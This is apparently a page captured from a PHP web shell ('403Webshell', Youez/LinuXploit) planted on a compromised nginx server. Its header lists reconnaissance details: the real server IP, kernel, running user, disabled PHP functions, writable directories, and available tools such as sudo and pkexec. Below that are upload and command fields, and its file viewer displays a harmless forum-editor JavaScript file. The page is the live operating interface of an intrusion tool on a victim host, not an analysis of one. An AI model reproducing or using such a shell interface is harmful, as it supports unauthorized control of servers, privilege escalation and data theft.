403Webshell
Server IP : 156.238.232.47  /  Your IP : 216.73.216.150
Web Server : nginx/1.25.3
System : Linux C202504152095410 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : www ( 1000)
PHP Version : 8.3.25
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/data/wwwroot/2026_06_02_05/data/cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/data/wwwroot/2026_06_02_05/data/cache/seditor.js
function seditor_showimgmenu(seditorkey) {var imgurl = $(seditorkey + '_image_param_1').value;var width = parseInt($(seditorkey + '_image_param_2').value);var height = parseInt($(seditorkey + '_image_param_3').value);var extparams = '';if(width || height) {extparams = '=' + width + ',' + height}seditor_insertunit(seditorkey, '[img' + extparams + ']' + imgurl, '[/img]', null, 1);$(seditorkey + '_image_param_1').value = '';hideMenu();}function seditor_menu(seditorkey, tag) {var sel = false;if(!isUndefined($(seditorkey + 'message').selectionStart)) {sel = $(seditorkey + 'message').selectionEnd - $(seditorkey + 'message').selectionStart;} else if(document.selection && document.selection.createRange) {$(seditorkey + 'message').focus();var sel = document.selection.createRange();$(seditorkey + 'message').sel = sel;sel = sel.text ? true : false;}if(sel) {seditor_insertunit(seditorkey, '[' + tag + ']', '[/' + tag + ']');return;}var ctrlid = seditorkey + tag;var menuid = ctrlid + '_menu';if(!$(menuid)) {switch(tag) {case 'at':curatli = 0;atsubmitid = ctrlid + '_submit';setTimeout(function() {atFilter('', 'at_list','atListSet');$('atkeyword').focus();}, 100);str = $L('input_username') + ':<br /><input type="text" id="atkeyword" style="width:240px" value="" class="px" onkeydown="atFilter(this.value, \'at_list\',\'atListSet\',event);" /><div class="p_pop" id="at_list" style="width:250px;"><ul><li>' + $L('at_notice') + '</li></ul></div>';submitstr = 'seditor_insertunit(\'' + seditorkey + '\', \'@\' + $(\'atkeyword\').value.replace(/<\\/?b>/g, \'\')+\' \'); hideMenu();';break;case 'url':str = $L('input_link_href') + ':<br /><input type="text" id="' + ctrlid + '_param_1" sautocomplete="off" style="width: 98%" value="" class="px" />' +'<br />' + $L('input_link_text') + ':<br /><input type="text" id="' + ctrlid + '_param_2" style="width: 98%" value="" class="px" />';submitstr = "$('" + ctrlid + "_param_2').value !== '' ? seditor_insertunit('" + seditorkey + "', '[url='+seditor_squarestrip($('" + ctrlid + "_param_1').value)+']'+$('" + ctrlid + "_param_2').value, '[/url]', null, 1) : seditor_insertunit('" + seditorkey + "', '[url]'+$('" + ctrlid + "_param_1').value, '[/url]', null, 1);hideMenu();";break;case 'code':case 'quote':var tagl = {'quote' : $L('input_quote'), 'code' : $L('input_code')};str = tagl[tag] + ':<br /><textarea id="' + ctrlid + '_param_1" style="width: 98%" cols="50" rows="5" class="txtarea"></textarea>';submitstr = "seditor_insertunit('" + seditorkey + "', '[" + tag + "]'+$('" + ctrlid + "_param_1').value, '[/" + tag + "]', null, 1);hideMenu();";break;case 'img':str = $L('input_img') + ':<br /><input type="text" id="' + ctrlid + '_param_1" style="width: 98%" value="" class="px" onchange="loadimgsize(this.value, \'' + seditorkey + '\',\'' + tag + '\')" />' +'<p class="mtm">' + $L('width') + '(' + $L('optional') + '): <input type="text" id="' + ctrlid + '_param_2" style="width: 15%" value="" class="px" /> &nbsp;' +$L('height') + '(' + $L('optional') + '): <input type="text" id="' + ctrlid + '_param_3" style="width: 15%" value="" class="px" /></p>';submitstr = "seditor_insertunit('" + seditorkey + "', '[img' + ($('" + ctrlid + "_param_2').value !== '' && $('" + ctrlid + "_param_3').value !== '' ? '='+$('" + ctrlid + "_param_2').value+','+$('" + ctrlid + "_param_3').value : '')+']'+seditor_squarestrip($('" + ctrlid + "_param_1').value), '[/img]', null, 1);hideMenu();";break;}var menu = document.createElement('div');menu.id = menuid;menu.style.display = 'none';menu.className = 'p_pof upf';menu.style.width = '270px';$('append_parent').appendChild(menu);menu.innerHTML = '<span class="y"><a onclick="hideMenu()" class="flbc" href="javascript:;">' + $L('close') + '</a></span><div class="p_opt cl"><form onsubmit="' + submitstr + ';return false;" autocomplete="off"><div>' + str + '</div><div class="pns mtn"><button type="submit" id="' + ctrlid + '_submit" class="pn pnc"><strong>' + $L('submit') + '</strong></button><button type="button" onClick="hideMenu()" class="pn"><em>' + $L('cancel') + '</em></button></div></form></div>';}showMenu({'ctrlid':ctrlid,'evt':'click','duration':3,'cache':0,'drag':1});}function seditor_squarestrip(str) {str = str.replace('[', '%5B');str = str.replace(']', '%5D');return str;}function seditor_insertunit(key, text, textend, moveend, selappend) {if($(key + 'message')) {$(key + 'message').focus();}textend = isUndefined(textend) ? '' : textend;moveend = isUndefined(textend) ? 0 : moveend;selappend = isUndefined(selappend) ? 1 : selappend;startlen = strlen(text);endlen = strlen(textend);if(!isUndefined($(key + 'message').selectionStart)) {if(selappend) {var opn = $(key + 'message').selectionStart + 0;if(textend != '') {text = text + $(key + 'message').value.substring($(key + 'message').selectionStart, $(key + 'message').selectionEnd) + textend;}$(key + 'message').value = $(key + 'message').value.substr(0, $(key + 'message').selectionStart) + text + $(key + 'message').value.substr($(key + 'message').selectionEnd);if(!moveend) {$(key + 'message').selectionStart = opn + strlen(text) - endlen;$(key + 'message').selectionEnd = opn + strlen(text) - endlen;}} else {text = text + textend;$(key + 'message').value = $(key + 'message').value.substr(0, $(key + 'message').selectionStart) + text + $(key + 'message').value.substr($(key + 'message').selectionEnd);}} else if(document.selection && document.selection.createRange) {var sel = document.selection.createRange();if(!sel.text.length && $(key + 'message').sel) {sel = $(key + 'message').sel;$(key + 'message').sel = null;}if(selappend) {if(textend != '') {text = text + sel.text + textend;}sel.text = text.replace(/\r?\n/g, '\r\n');if(!moveend) {sel.moveStart('character', -endlen);sel.moveEnd('character', -endlen);}sel.select();} else {sel.text = text + textend;}} else {$(key + 'message').value += text;}hideMenu(2);}function seditor_ctlent(event, script) {if(event.ctrlKey && event.keyCode == 13 || event.altKey && event.keyCode == 83) {eval(script);}}function loadimgsize(imgurl, editor, p) {var editor = !editor ? editorid : editor;var s = new Object();var p = !p ? '_image' : p;s.img = new Image();s.img.src = imgurl;s.loadCheck = function () {if(s.img.complete) {$(editor + p + '_param_2').value = s.img.width ? s.img.width : '';$(editor + p + '_param_3').value = s.img.height ? s.img.height : '';} else {setTimeout(function () {s.loadCheck();}, 100);}};s.loadCheck();}

Youez - 2016 - github.com/yon3zu
LinuXploit